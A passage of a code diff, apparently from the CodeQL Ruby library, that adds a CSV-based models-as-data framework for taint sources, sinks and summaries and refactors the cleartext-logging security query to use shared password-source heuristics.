-  class RegexpEscapeSummary extends SummarizedCallable {
-    RegexpEscapeSummary() { this = "Regexp.escape" }
-
-    override MethodCall getACall() {
-      result =
-        API::getTopLevelMember("Regexp").getAMethodCall(["escape", "quote"]).asExpr().getExpr()
-    }
-
-    override predicate propagatesFlowExt(string input, string output, boolean preservesValue) {
-      input = "Argument[0]" and
-      output = "ReturnValue" and
-      preservesValue = false
+  class RegexpEscapeSummary extends ModelInput::SummaryModelCsv {
+    override predicate row(string row) {
+      row = ";;Member[Regexp].Method[escape,quote];Argument[0];ReturnValue;taint"
    }
  }
 }
--- a/ruby/ql/lib/codeql/ruby/frameworks/data/ModelsAsData.qll
+++ b/ruby/ql/lib/codeql/ruby/frameworks/data/ModelsAsData.qll
@@ -0,0 +1,31 @@
+/**
+ * Provides classes for contributing a model, or using the interpreted results
+ * of a model represented as data.
+ *
+ * - Use the `ModelInput` module to contribute new models.
+ * - Use the `ModelOutput` module to access the model results in terms of API nodes.
+ *
+ * The `package` part of a CSV row should be the name of a Ruby gem, or the empty
+ * string if it's referring to the standard library.
+ *
+ * The `type` part can be one of the following:
+ *   - the empty string, referring to the global scope,
+ *   - the string `any`, referring to any expression, or
+ *   - the name of a type definition from `ModelInput::TypeModelCsv`
+ */
+
+private import ruby
+private import internal.ApiGraphModels as Shared
+private import internal.ApiGraphModelsSpecific as Specific
+import Shared::ModelInput as ModelInput
+import Shared::ModelOutput as ModelOutput
+private import codeql.ruby.dataflow.RemoteFlowSources
+
+/**
+ * A remote flow source originating from a CSV source row.
+ */
+private class RemoteFlowSourceFromCsv extends RemoteFlowSource::Range {
+  RemoteFlowSourceFromCsv() { this = ModelOutput::getASourceNode("remote").getAnImmediateUse() }
+
+  override string getSourceType() { result = "Remote flow (from model)" }
+}
--- a/ruby/ql/lib/codeql/ruby/frameworks/data/internal/ApiGraphModels.qll
+++ b/ruby/ql/lib/codeql/ruby/frameworks/data/internal/ApiGraphModels.qll
@@ -0,0 +1,522 @@
+/**
+ * INTERNAL use only. This is an experimental API subject to change without notice.
+ *
+ * Provides classes and predicates for dealing with flow models specified in CSV format.
+ *
+ * The CSV specification has the following columns:
+ * - Sources:
+ *   `package; type; path; kind`
+ * - Sinks:
+ *   `package; type; path; kind`
+ * - Summaries:
+ *   `package; type; path; input; output; kind`
+ * - Types:
+ *   `package1; type1; package2; type2; path`
+ *
+ * The interpretation of a row is similar to API-graphs with a left-to-right
+ * reading.
+ * 1. The `package` column selects a package name, as it would be referenced in the source code,
+ *    such as an NPM package, PIP package, or Ruby gem. (See `ModelsAsData.qll` for language-specific details).
+ *    It may also be a synthetic package used for a type definition (see type definitions below).
+ * 2. The `type` column selects all instances of a named type originating from that package,
+ *    or the empty string if referring to the package itself.
+ *    It can also be a synthetic type name defined by a type definition (see type definitions below).
+ * 3. The `path` column is a `.`-separated list of "access path tokens" to resolve, starting at the node selected by `package` and `type`.
+ *
+ *    Every language supports the following tokens:
+ *     - Argument[n]: the n-th argument to a call. May be a range of form `x..y` (inclusive) and/or a comma-separated list.
+ *                    Additionally, `N-1` refers to the last argument, `N-2` refers to the second-last, and so on.
+ *     - Parameter[n]: the n-th parameter of a callback. May be a range of form `x..y` (inclusive) and/or a comma-separated list.
+ *     - ReturnValue: the value returned by a function call
+ *     - WithArity[n]: match a call with the given arity. May be a range of form `x..y` (inclusive) and/or a comma-separated list.
+ *
+ *    The following tokens are common and should be implemented for languages where it makes sense:
+ *     - Member[x]: a member named `x`; exactly what a "member" is depends on the language. May be a comma-separated list of names.
+ *     - Instance: an instance of a class
+ *     - Subclass: a subclass of a class
+ *     - ArrayElement: an element of array
+ *     - Element: an element of a collection-like object
+ *     - MapKey: a key in map-like object
+ *     - MapValue: a value in a map-like object
+ *     - Awaited: the value from a resolved promise/future-like object
+ *
+ *    For the time being, please consult `ApiGraphModelsSpecific.qll` to see which language-specific tokens are currently supported.
+ *
+ * 4. The `input` and `output` columns specify how data enters and leaves the element selected by the
+ *    first `(package, type, path)` tuple. Both strings are `.`-separated access paths
+ *    of the same syntax as the `path` column.
+ * 5. The `kind` column is a tag that can be referenced from QL to determine to
+ *    which classes the interpreted elements should be added. For example, for
+ *    sources `"remote"` indicates a default remote flow source, and for summaries
+ *    `"taint"` indicates a default additional taint step and `"value"` indicates a
+ *    globally applicable value-preserving step.
+ *
+ * ### Types
+ *
+ * A type row of form `package1; type1; package2; type2; path` indicates that `package2; type2; path`
+ * should be seen as an instance of the type `package1; type1`.
+ *
+ * A `(package,type)` pair may refer to a static type or a synthetic type name used internally in the model.
+ * Synthetic type names can be used to reuse intermediate sub-paths, when there are multiple ways to access the same
+ * element.
+ * See `ModelsAsData.qll` for the language-specific interpretation of packages and static type names.
+ *
+ * By convention, if one wants to avoid clashes with static types from the package, the type name
+ * should be prefixed with a tilde character (`~`). For example, `(foo, ~Bar)` can be used to indicate that
+ * the type is related to the `foo` package but is not intended to match a static type.
+ */
+
+private import ApiGraphModelsSpecific as Specific
+
+private class Unit = Specific::Unit;
+
+private module API = Specific::API;
+
+private import Specific::AccessPathSyntax
+
+/** Module containing hooks for providing input data to be interpreted as a model. */
+module ModelInput {
+  /**
+   * A unit class for adding additional source model rows.
+   *
+   * Extend this class to add additional source definitions.
+   */
+  class SourceModelCsv extends Unit {
+    /**
+     * Holds if `row` specifies a source definition.
+     *
+     * A row of form
+     * ```
+     * package;type;path;kind
+     * ```
+     * indicates that the value at `(package, type, path)` should be seen as a flow
+     * source of the given `kind`.
+     *
+     * The kind `remote` represents a general remote flow source.
+     */
+    abstract predicate row(string row);
+  }
+
+  /**
+   * A unit class for adding additional sink model rows.
+   *
+   * Extend this class to add additional sink definitions.
+   */
+  class SinkModelCsv extends Unit {
+    /**
+     * Holds if `row` specifies a sink definition.
+     *
+     * A row of form
+     * ```
+     * package;type;path;kind
+     * ```
+     * indicates that the value at `(package, type, path)` should be seen as a sink
+     * of the given `kind`.
+     */
+    abstract predicate row(string row);
+  }
+
+  /**
+   * A unit class for adding additional summary model rows.
+   *
+   * Extend this class to add additional flow summary definitions.
+   */
+  class SummaryModelCsv extends Unit {
+    /**
+     * Holds if `row` specifies a summary definition.
+     *
+     * A row of form
+     * ```
+     * package;type;path;input;output;kind
+     * ```
+     * indicates that for each call to `(package, type, path)`, the value referred to by `input`
+     * can flow to the value referred to by `output`.
+     *
+     * `kind` should be either `value` or `taint`, for value-preserving or taint-preserving steps,
+     * respectively.
+     */
+    abstract predicate row(string row);
+  }
+
+  /**
+   * A unit class for adding additional type model rows.
+   *
+   * Extend this class to add additional type definitions.
+   */
+  class TypeModelCsv extends Unit {
+    /**
+     * Holds if `row` specifies a type definition.
+     *
+     * A row of form,
+     * ```
+     * package1;type1;package2;type2;path
+     * ```
+     * indicates that `(package2, type2, path)` should be seen as an instance of `(package1, type1)`.
+     */
+    abstract predicate row(string row);
+  }
+}
+
+private import ModelInput
+
+/**
+ * An empty class, except in specific tests.
+ *
+ * If this is non-empty, all models are parsed even if the package is not
+ * considered relevant for the current database.
+ */
+abstract class TestAllModels extends Unit { }
+
+/**
+ * Gets the string that equals `s` once `;dummy` is appended to it. Used to pad rows, working
+ * around the fact that `string.split(delim,n)` does not preserve empty trailing substrings.
+ */
+bindingset[result]
+private string inversePad(string s) { s = result + ";dummy" }
+
+private predicate sourceModel(string row) { any(SourceModelCsv s).row(inversePad(row)) }
+
+private predicate sinkModel(string row) { any(SinkModelCsv s).row(inversePad(row)) }
+
+private predicate summaryModel(string row) { any(SummaryModelCsv s).row(inversePad(row)) }
+
+private predicate typeModel(string row) { any(TypeModelCsv s).row(inversePad(row)) }
+
+/** Holds if a source model exists for the given parameters. */
+predicate sourceModel(string package, string type, string path, string kind) {
+  exists(string row |
+    sourceModel(row) and
+    row.splitAt(";", 0) = package and
+    row.splitAt(";", 1) = type and
+    row.splitAt(";", 2) = path and
+    row.splitAt(";", 3) = kind
+  )
+}
+
+/** Holds if a sink model exists for the given parameters. */
+private predicate sinkModel(string package, string type, string path, string kind) {
+  exists(string row |
+    sinkModel(row) and
+    row.splitAt(";", 0) = package and
+    row.splitAt(";", 1) = type and
+    row.splitAt(";", 2) = path and
+    row.splitAt(";", 3) = kind
+  )
+}
+
+/** Holds if a summary model exists for the given parameters. */
+private predicate summaryModel(
+  string package, string type, string path, string input, string output, string kind
+) {
+  exists(string row |
+    summaryModel(row) and
+    row.splitAt(";", 0) = package and
+    row.splitAt(";", 1) = type and
+    row.splitAt(";", 2) = path and
+    row.splitAt(";", 3) = input and
+    row.splitAt(";", 4) = output and
+    row.splitAt(";", 5) = kind
+  )
+}
+
+/** Holds if a type model exists for the given parameters. */
+private predicate typeModel(
+  string package1, string type1, string package2, string type2, string path
+) {
+  exists(string row |
+    typeModel(row) and
+    row.splitAt(";", 0) = package1 and
+    row.splitAt(";", 1) = type1 and
+    row.splitAt(";", 2) = package2 and
+    row.splitAt(";", 3) = type2 and
+    row.splitAt(";", 4) = path
+  )
+}
+
+/**
+ * Gets a package that should be seen as an alias for the given other `package`,
+ * or the `package` itself.
+ */
+bindingset[package]
+bindingset[result]
+string getAPackageAlias(string package) {
+  typeModel(package, "", result, "", "")
+  or
+  result = package
+}
+
+/**
+ * Holds if CSV rows involving `package` might be relevant for the analysis of this database.
+ */
+private predicate isRelevantPackage(string package) {
+  (
+    sourceModel(package, _, _, _) or
+    sinkModel(package, _, _, _) or
+    summaryModel(package, _, _, _, _, _) or
+    typeModel(package, _, _, _, _)
+  ) and
+  (
+    Specific::isPackageUsed(package)
+    or
+    exists(TestAllModels t)
+  )
+  or
+  exists(string other |
+    isRelevantPackage(other) and
+    typeModel(package, _, other, _, _)
+  )
+}
+
+/**
+ * Holds if `package,type,path` is used in some CSV row.
+ */
+pragma[nomagic]
+predicate isRelevantFullPath(string package, string type, string path) {
+  isRelevantPackage(package) and
+  (
+    sourceModel(package, type, path, _) or
+    sinkModel(package, type, path, _) or
+    summaryModel(package, type, path, _, _, _) or
+    typeModel(_, _, package, type, path)
+  )
+}
+
+/** A string from a CSV row that should be parsed as an access path. */
+private class AccessPathRange extends AccessPath::Range {
+  AccessPathRange() {
+    isRelevantFullPath(_, _, this)
+    or
+    exists(string package | isRelevantPackage(package) |
+      summaryModel(package, _, _, this, _, _) or
+      summaryModel(package, _, _, _, this, _)
+    )
+  }
+}
+
+/**
+ * Gets a successor of `node` in the API graph, reached by resolving `token`.
+ */
+bindingset[token]
+API::Node getSuccessorFromNode(API::Node node, AccessPathToken token) {
+  // API graphs use the same label for arguments and parameters. An edge originating from a
+  // use-node represents an argument, and an edge originating from a def-node represents a parameter.
+  // We just map both to the same thing.
+  token.getName() = ["Argument", "Parameter"] and
+  result = node.getParameter(AccessPath::parseIntUnbounded(token.getAnArgument()))
+  or
+  token.getName() = "ReturnValue" and
+  result = node.getReturn()
+  or
+  // Language-specific tokens
+  result = Specific::getExtraSuccessorFromNode(node, token)
+}
+
+/**
+ * Gets an API-graph successor for the given invocation.
+ */
+bindingset[token]
+API::Node getSuccessorFromInvoke(Specific::InvokeNode invoke, AccessPathToken token) {
+  token.getName() = "Argument" and
+  result =
+    invoke
+        .getParameter(AccessPath::parseIntWithArity(token.getAnArgument(), invoke.getNumArgument()))
+  or
+  token.getName() = "ReturnValue" and
+  result = invoke.getReturn()
+  or
+  // Language-specific tokens
+  result = Specific::getExtraSuccessorFromInvoke(invoke, token)
+}
+
+/**
+ * Holds if `invoke` matches the call-site filter given by `token`.
+ */
+pragma[inline]
+private predicate invocationMatchesCallSiteFilter(Specific::InvokeNode invoke, AccessPathToken token) {
+  token.getName() = "WithArity" and
+  invoke.getNumArgument() = AccessPath::parseIntUnbounded(token.getAnArgument())
+  or
+  Specific::invocationMatchesExtraCallSiteFilter(invoke, token)
+}
+
+/**
+ * Gets the API node identified by the first `n` tokens of `path` in the given `(package, type, path)` tuple.
+ */
+pragma[nomagic]
+private API::Node getNodeFromPath(string package, string type, AccessPath path, int n) {
+  isRelevantFullPath(package, type, path) and
+  (
+    n = 0 and
+    exists(string package2, string type2, AccessPath path2 |
+      typeModel(package, type, package2, type2, path2) and
+      result = getNodeFromPath(package2, type2, path2, path2.getNumToken())
+    )
+    or
+    // Language-specific cases, such as handling of global variables
+    result = Specific::getExtraNodeFromPath(package, type, path, n)
+  )
+  or
+  result = getSuccessorFromNode(getNodeFromPath(package, type, path, n - 1), path.getToken(n - 1))
+  or
+  // Similar to the other recursive case, but where the path may have stepped through one or more call-site filters
+  result =
+    getSuccessorFromInvoke(getInvocationFromPath(package, type, path, n - 1), path.getToken(n - 1))
+}
+
+/** Gets the node identified by the given `(package, type, path)` tuple. */
+API::Node getNodeFromPath(string package, string type, AccessPath path) {
+  result = getNodeFromPath(package, type, path, path.getNumToken())
+}
+
+/**
+ * Gets an invocation identified by the first `n` tokens of `path` in the given `(package, type, path)` tuple.
+ *
+ * Unlike `getNodeFromPath`, the `path` may end with one or more call-site filters.
+ */
+Specific::InvokeNode getInvocationFromPath(string package, string type, AccessPath path, int n) {
+  result = Specific::getAnInvocationOf(getNodeFromPath(package, type, path, n))
+  or
+  result = getInvocationFromPath(package, type, path, n - 1) and
+  invocationMatchesCallSiteFilter(result, path.getToken(n - 1))
+}
+
+/** Gets an invocation identified by the given `(package, type, path)` tuple. */
+Specific::InvokeNode getInvocationFromPath(string package, string type, AccessPath path) {
+  result = getInvocationFromPath(package, type, path, path.getNumToken())
+}
+
+/**
+ * Holds if `name` is a valid name for an access path token in the identifying access path.
+ */
+bindingset[name]
+predicate isValidTokenNameInIdentifyingAccessPath(string name) {
+  name = ["Argument", "Parameter", "ReturnValue", "WithArity"]
+  or
+  Specific::isExtraValidTokenNameInIdentifyingAccessPath(name)
+}
+
+/**
+ * Holds if `name` is a valid name for an access path token with no arguments, occurring
+ * in an identifying access path.
+ */
+bindingset[name]
+predicate isValidNoArgumentTokenInIdentifyingAccessPath(string name) {
+  name = "ReturnValue"
+  or
+  Specific::isExtraValidNoArgumentTokenInIdentifyingAccessPath(name)
+}
+
+/**
+ * Holds if `argument` is a valid argument to an access path token with the given `name`, occurring
+ * in an identifying access path.
+ */
+bindingset[name, argument]
+predicate isValidTokenArgumentInIdentifyingAccessPath(string name, string argument) {
+  name = ["Argument", "Parameter"] and
+  argument.regexpMatch("(N-|-)?\\d+(\\.\\.(N-|-)?\\d+)?")
+  or
+  name = "WithArity" and
+  argument.regexpMatch("\\d+(\\.\\.\\d+)?")
+  or
+  Specific::isExtraValidTokenArgumentInIdentifyingAccessPath(name, argument)
+}
+
+/**
+ * Module providing access to the imported models in terms of API graph nodes.
+ */
+module ModelOutput {
+  /**
+   * Gets an API node that a CSV source model contributed as a source of the given `kind`.
+   */
+  API::Node getASourceNode(string kind) {
+    exists(string package, string type, string path |
+      sourceModel(package, type, path, kind) and
+      result = getNodeFromPath(package, type, path)
+    )
+  }
+
+  /**
+   * Gets an API node that a CSV sink model contributed as a sink of the given `kind`.
+   */
+  API::Node getASinkNode(string kind) {
+    exists(string package, string type, string path |
+      sinkModel(package, type, path, kind) and
+      result = getNodeFromPath(package, type, path)
+    )
+  }
+
+  /**
+   * Holds if a relevant CSV summary exists for these parameters.
+   */
+  predicate relevantSummaryModel(
+    string package, string type, string path, string input, string output, string kind
+  ) {
+    isRelevantPackage(package) and
+    summaryModel(package, type, path, input, output, kind)
+  }
+
+  /**
+   * Holds if `baseNode` is an invocation identified by the `package,type,path` part of a summary row.
+   */
+  predicate resolvedSummaryBase(
+    string package, string type, string path, Specific::InvokeNode baseNode
+  ) {
+    summaryModel(package, type, path, _, _, _) and
+    baseNode = getInvocationFromPath(package, type, path)
+  }
+
+  /**
+   * Gets an API node that is seen as an instance of `(package,type)` due to a type definition
+   * contributed by a CSV model.
+   */
+  API::Node getATypeNode(string package, string type) {
+    exists(string package2, string type2, AccessPath path |
+      typeModel(package, type, package2, type2, path) and
+      result = getNodeFromPath(package2, type2, path)
+    )
+  }
+
+  /**
+   * Gets an error message relating to an invalid CSV row in a model.
+   */
+  string getAWarning() {
+    // Check number of columns
+    exists(string row, string kind, int expectedArity, int actualArity |
+      any(SourceModelCsv csv).row(row) and kind = "source" and expectedArity = 4
+      or
+      any(SinkModelCsv csv).row(row) and kind = "sink" and expectedArity = 4
+      or
+      any(SummaryModelCsv csv).row(row) and kind = "summary" and expectedArity = 6
+      or
+      any(TypeModelCsv csv).row(row) and kind = "type" and expectedArity = 5
+    |
+      actualArity = count(row.indexOf(";")) + 1 and
+      actualArity != expectedArity and
+      result =
+        "CSV " + kind + " row should have " + expectedArity + " columns but has " + actualArity +
+          ": " + row
+    )
+    or
+    // Check names and arguments of access path tokens
+    exists(AccessPath path, AccessPathToken token |
+      isRelevantFullPath(_, _, path) and
+      token = path.getToken(_)
+    |
+      not isValidTokenNameInIdentifyingAccessPath(token.getName()) and
+      result = "Invalid token name '" + token.getName() + "' in access path: " + path
+      or
+      isValidTokenNameInIdentifyingAccessPath(token.getName()) and
+      exists(string argument |
+        argument = token.getAnArgument() and
+        not isValidTokenArgumentInIdentifyingAccessPath(token.getName(), argument) and
+        result =
+          "Invalid argument '" + argument + "' in token '" + token + "' in access path: " + path
+      )
+      or
+      isValidTokenNameInIdentifyingAccessPath(token.getName()) and
+      token.getNumArgument() = 0 and
+      not isValidNoArgumentTokenInIdentifyingAccessPath(token.getName()) and
+      result = "Invalid token '" + token + "' is missing its arguments, in access path: " + path
+    )
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/frameworks/data/internal/ApiGraphModelsSpecific.qll
+++ b/ruby/ql/lib/codeql/ruby/frameworks/data/internal/ApiGraphModelsSpecific.qll
@@ -0,0 +1,168 @@
+/**
+ * Contains the language-specific part of the models-as-data implementation found in `ApiGraphModels.qll`.
+ *
+ * It must export the following members:
+ * ```ql
+ * class Unit // a unit type
+ * class InvokeNode // a type representing an invocation connected to the API graph
+ * module API // the API graph module
+ * predicate isPackageUsed(string package)
+ * API::Node getExtraNodeFromPath(string package, string type, string path, int n)
+ * API::Node getExtraSuccessorFromNode(API::Node node, AccessPathToken token)
+ * API::Node getExtraSuccessorFromInvoke(InvokeNode node, AccessPathToken token)
+ * predicate invocationMatchesExtraCallSiteFilter(InvokeNode invoke, AccessPathToken token)
+ * InvokeNode getAnInvocationOf(API::Node node)
+ * ```
+ */
+
+private import ruby
+private import codeql.ruby.DataFlow
+private import codeql.ruby.dataflow.internal.DataFlowPrivate as DataFlowPrivate
+private import ApiGraphModels
+
+class Unit = DataFlowPrivate::Unit;
+
+// Re-export libraries needed by ApiGraphModels.qll
+import codeql.ruby.ApiGraphs
+import codeql.ruby.dataflow.internal.AccessPathSyntax as AccessPathSyntax
+private import AccessPathSyntax
+
+/**
+ * Holds if models describing `package` may be relevant for the analysis of this database.
+ *
+ * In the context of Ruby, this is the name of a Ruby gem.
+ */
+bindingset[package]
+predicate isPackageUsed(string package) {
+  // For now everything is modelled as an access path starting at any top-level, so the package name has no effect.
+  //
+  // We allow an arbitrary package name so that the model can record the name of the package in case it's needed in the future.
+  //
+  // In principle we should consider a package to be "used" if there is a transitive dependency on it, but we can only
+  // reliably see the direct dependencies.
+  //
+  // In practice, packages try to use unique top-level module names, which mitigates the precision loss of not checking
+  // the package name.
+  any()
+}
+
+/** Gets a Ruby-specific interpretation of the `(package, type, path)` tuple after resolving the first `n` access path tokens. */
+bindingset[package, type, path]
+API::Node getExtraNodeFromPath(string package, string type, AccessPath path, int n) {
+  isRelevantFullPath(package, type, path) and
+  exists(package) and // Allow any package name, see `isPackageUsed`.
+  type = "" and
+  n = 0 and
+  result = API::root()
+  or
+  // A row of form `;any;Method[foo]` should match any method named `foo`.
+  exists(package) and
+  type = "any" and
+  n = 1 and
+  exists(EntryPointFromAnyType entry |
+    methodMatchedByName(path, entry.getName()) and
+    result = entry.getANode()
+  )
+}
+
+/**
+ * Holds if `path` occurs in a CSV row with type `any`, meaning it can start
+ * matching anywhere, and the path begins with `Method[methodName]`.
+ */
+private predicate methodMatchedByName(AccessPath path, string methodName) {
+  isRelevantFullPath(_, "any", path) and
+  exists(AccessPathToken token |
+    token = path.getToken(0) and
+    token.getName() = "Method" and
+    methodName = token.getAnArgument()
+  )
+}
+
+/**
+ * An API graph entry point corresponding to a method name such as `foo` in `;any;Method[foo]`.
+ *
+ * This ensures that the API graph rooted in that method call is materialized.
+ */
+private class EntryPointFromAnyType extends API::EntryPoint {
+  string name;
+
+  EntryPointFromAnyType() { this = "AnyMethod[" + name + "]" and methodMatchedByName(_, name) }
+
+  override DataFlow::CallNode getACall() { result.getMethodName() = name }
+
+  string getName() { result = name }
+}
+
+/**
+ * Gets a Ruby-specific API graph successor of `node` reachable by resolving `token`.
+ */
+bindingset[token]
+API::Node getExtraSuccessorFromNode(API::Node node, AccessPathToken token) {
+  token.getName() = "Member" and
+  result = node.getMember(token.getAnArgument())
+  or
+  token.getName() = "Method" and
+  result = node.getMethod(token.getAnArgument())
+  or
+  token.getName() = "Instance" and
+  result = node.getInstance()
+  or
+  token.getName() = "BlockArgument" and
+  result = node.getBlock()
+  // Note: The "ArrayElement" token is not implemented yet, as it ultimately requires type-tracking and
+  // API graphs to be aware of the steps involving ArrayElement contributed by the standard library model.
+  // Type-tracking cannot summarize function calls on its own, so it doesn't benefit from synthesized callables.
+}
+
+/**
+ * Gets a Ruby-specific API graph successor of the invocation `node` reachable by resolving `token`. Currently there are none.
+ */
+bindingset[token]
+API::Node getExtraSuccessorFromInvoke(InvokeNode node, AccessPathToken token) { none() }
+
+/**
+ * Holds if `invoke` matches the Ruby-specific call site filter in `token`.
+ */
+bindingset[token]
+predicate invocationMatchesExtraCallSiteFilter(InvokeNode invoke, AccessPathToken token) {
+  token.getName() = "WithBlock" and
+  exists(invoke.getBlock())
+  or
+  token.getName() = "WithoutBlock" and
+  not exists(invoke.getBlock())
+}
+
+/** An API graph node representing a method call. */
+class InvokeNode extends API::MethodAccessNode {
+  /** Gets the number of arguments to the call. */
+  int getNumArgument() { result = getCallNode().getNumberOfArguments() }
+}
+
+/** Gets the `InvokeNode` corresponding to a specific invocation of `node`. */
+InvokeNode getAnInvocationOf(API::Node node) { result = node }
+
+/**
+ * Holds if `name` is a valid name for an access path token in the identifying access path.
+ */
+bindingset[name]
+predicate isExtraValidTokenNameInIdentifyingAccessPath(string name) {
+  name = ["Member", "Method", "Instance", "WithBlock", "WithoutBlock", "BlockArgument"]
+}
+
+/**
+ * Holds if `name` is a valid name for an access path token with no arguments, occurring
+ * in an identifying access path.
+ */
+predicate isExtraValidNoArgumentTokenInIdentifyingAccessPath(string name) {
+  name = ["Instance", "WithBlock", "WithoutBlock", "BlockArgument"]
+}
+
+/**
+ * Holds if `argument` is a valid argument to an access path token with the given `name`, occurring
+ * in an identifying access path.
+ */
+bindingset[name, argument]
+predicate isExtraValidTokenArgumentInIdentifyingAccessPath(string name, string argument) {
+  name = ["Member", "Method"] and
+  exists(argument)
+}
--- a/ruby/ql/lib/codeql/ruby/security/CleartextLoggingCustomizations.qll
+++ b/ruby/ql/lib/codeql/ruby/security/CleartextLoggingCustomizations.qll
@@ -6,12 +6,8 @@

 private import ruby
 private import codeql.ruby.DataFlow
-private import codeql.ruby.TaintTracking::TaintTracking
 private import codeql.ruby.Concepts
-private import codeql.ruby.dataflow.RemoteFlowSources
-private import internal.SensitiveDataHeuristics::HeuristicNames
-private import codeql.ruby.CFG
-private import codeql.ruby.dataflow.SSA
+private import internal.CleartextSources

 /**
 * Provides default sources, sinks and sanitizers for reasoning about
@@ -22,265 +18,25 @@ module CleartextLogging {
  /**
   * A data flow source for cleartext logging of sensitive information.
   */
-  abstract class Source extends DataFlow::Node {
-    /** Gets a string that describes the type of this data flow source. */
-    abstract string describe();
-  }
+  class Source = CleartextSources::Source;
+
+  /**
+   * A sanitizer for cleartext logging of sensitive information.
+   */
+  class Sanitizer = CleartextSources::Sanitizer;
+
+  /** Holds if `nodeFrom` taints `nodeTo`. */
+  predicate isAdditionalTaintStep = CleartextSources::isAdditionalTaintStep/2;

  /**
   * A data flow sink for cleartext logging of sensitive information.
   */
  abstract class Sink extends DataFlow::Node { }

-  /**
-   * A sanitizer for cleartext logging of sensitive information.
-   */
-  abstract class Sanitizer extends DataFlow::Node { }
-
-  /**
-   * Holds if `re` may be a regular expression that can be used to sanitize
-   * sensitive data with a call to `sub`.
-   */
-  private predicate effectiveSubRegExp(CfgNodes::ExprNodes::RegExpLiteralCfgNode re) {
-    re.getConstantValue().getStringOrSymbol().matches([".*", ".+"])
-  }
-
-  /**
-   * Holds if `re` may be a regular expression that can be used to sanitize
-   * sensitive data with a call to `gsub`.
-   */
-  private predicate effectiveGsubRegExp(CfgNodes::ExprNodes::RegExpLiteralCfgNode re) {
-    re.getConstantValue().getStringOrSymbol().matches(".")
-  }
-
-  /**
-   * A call to `sub`/`sub!` or `gsub`/`gsub!` that seems to mask sensitive information.
-   */
-  private class MaskingReplacerSanitizer extends Sanitizer, DataFlow::CallNode {
-    MaskingReplacerSanitizer() {
-      exists(CfgNodes::ExprNodes::RegExpLiteralCfgNode re |
-        re = this.getArgument(0).asExpr() and
-        (
-          this.getMethodName() = ["sub", "sub!"] and effectiveSubRegExp(re)
-          or
-          this.getMethodName() = ["gsub", "gsub!"] and effectiveGsubRegExp(re)
-        )
-      )
-    }
-  }
-
-  /**
-   * Like `MaskingReplacerSanitizer` but updates the receiver for methods that
-   * sanitize the receiver.
-   * Taint is thereby cleared for any subsequent read.
-   */
-  private class InPlaceMaskingReplacerSanitizer extends Sanitizer {
-    InPlaceMaskingReplacerSanitizer() {
-      exists(MaskingReplacerSanitizer m | m.getMethodName() = ["gsub!", "sub!"] |
-        m.getReceiver() = this
-      )
-    }
-  }
-
-  /**
-   * Holds if `name` is for a method or variable that appears, syntactically, to
-   * not be sensitive.
-   */
-  bindingset[name]
-  private predicate nameIsNotSensitive(string name) {
-    name.regexpMatch(notSensitiveRegexp()) and
-    // By default `notSensitiveRegexp()` includes some false positives for
-    // common ruby method names that are not necessarily non-sensitive.
-    // We explicitly exclude element references, element assignments, and
-    // mutation methods.
-    not name = ["[]", "[]="] and
-    not name.matches("%!")
-  }
-
-  /**
-   * A call that might obfuscate a password, for example through hashing.
-   */
-  private class ObfuscatorCall extends Sanitizer, DataFlow::CallNode {
-    ObfuscatorCall() { nameIsNotSensitive(this.getMethodName()) }
-  }
-
-  /**
-   * A data flow node that does not contain a clear-text password, according to its syntactic name.
-   */
-  private class NameGuidedNonCleartextPassword extends NonCleartextPassword {
-    NameGuidedNonCleartextPassword() {
-      exists(string name | nameIsNotSensitive(name) |
-        // accessing a non-sensitive variable
-        this.asExpr().getExpr().(VariableReadAccess).getVariable().getName() = name
-        or
-        // dereferencing a non-sensitive field
-        this.asExpr()
-            .(CfgNodes::ExprNodes::ElementReferenceCfgNode)
-            .getArgument(0)
-            .getConstantValue()
-            .getStringOrSymbol() = name
-        or
-        // calling a non-sensitive method
-        this.(DataFlow::CallNode).getMethodName() = name
-      )
-      or
-      // avoid i18n strings
-      this.asExpr()
-          .(CfgNodes::ExprNodes::ElementReferenceCfgNode)
-          .getReceiver()
-          .getConstantValue()
-          .getStringOrSymbol()
-          .regexpMatch("(?is).*(messages|strings).*")
-    }
-  }
-
-  /**
-   * A data flow node that receives flow that is not a clear-text password.
-   */
-  private class NonCleartextPasswordFlow extends NonCleartextPassword {
-    NonCleartextPasswordFlow() {
-      any(NonCleartextPassword other).(DataFlow::LocalSourceNode).flowsTo(this)
-    }
-  }
-
-  /**
-   * A data flow node that does not contain a clear-text password.
-   */
-  abstract private class NonCleartextPassword extends DataFlow::Node { }
-
-  // `writeNode` assigns pair with key `name` to `val`
-  private predicate hashKeyWrite(DataFlow::CallNode writeNode, string name, DataFlow::Node val) {
-    writeNode.asExpr().getExpr() instanceof SetterMethodCall and
-    // hash[name]
-    writeNode.getArgument(0).asExpr().getConstantValue().getStringOrSymbol() = name and
-    // val
-    writeNode.getArgument(1).asExpr().(CfgNodes::ExprNodes::AssignExprCfgNode).getRhs() =
-      val.asExpr()
-  }
-
-  /**
-   * A write to a hash entry with a value that may contain password information.
-   */
-  private class HashKeyWritePasswordSource extends Source {
-    private string name;
-    private DataFlow::ExprNode recv;
-
-    HashKeyWritePasswordSource() {
-      exists(DataFlow::Node val |
-        name.regexpMatch(maybePassword()) and
-        not nameIsNotSensitive(name) and
-        // avoid safe values assigned to presumably unsafe names
-        not val instanceof NonCleartextPassword and
-        (
-          // hash[name] = val
-          hashKeyWrite(this, name, val) and
-          recv = this.(DataFlow::CallNode).getReceiver()
-        )
-      )
-    }
-
-    override string describe() { result = "a write to " + name }
-
-    /** Gets the name of the key */
-    string getName() { result = name }
-
-    /**
-     * Gets the name of the hash variable that this password source is assigned
-     * to, if applicable.
-     */
-    LocalVariable getVariable() {
-      result = recv.getExprNode().getExpr().(VariableReadAccess).getVariable()
-    }
-  }
-
-  /**
-   * A hash literal with an entry that may contain a password
-   */
-  private class HashLiteralPasswordSource extends Source {
-    private string name;
-
-    HashLiteralPasswordSource() {
-      exists(DataFlow::Node val, CfgNodes::ExprNodes::HashLiteralCfgNode lit |
-        name.regexpMatch(maybePassword()) and
-        not name.regexpMatch(notSensitiveRegexp()) and
-        // avoid safe values assigned to presumably unsafe names
-        not val instanceof NonCleartextPassword and
-        // hash = { name: val }
-        exists(CfgNodes::ExprNodes::PairCfgNode p |
-          this.asExpr() = lit and p = lit.getAKeyValuePair()
-        |
-          p.getKey().getConstantValue().getStringOrSymbol() = name and
-          p.getValue() = val.asExpr()
-        )
-      )
-    }
-
-    override string describe() { result = "an write to " + name }
-  }
-
-  /** An assignment that may assign a password to a variable */
-  private class AssignPasswordVariableSource extends Source {
-    string name;
-
-    AssignPasswordVariableSource() {
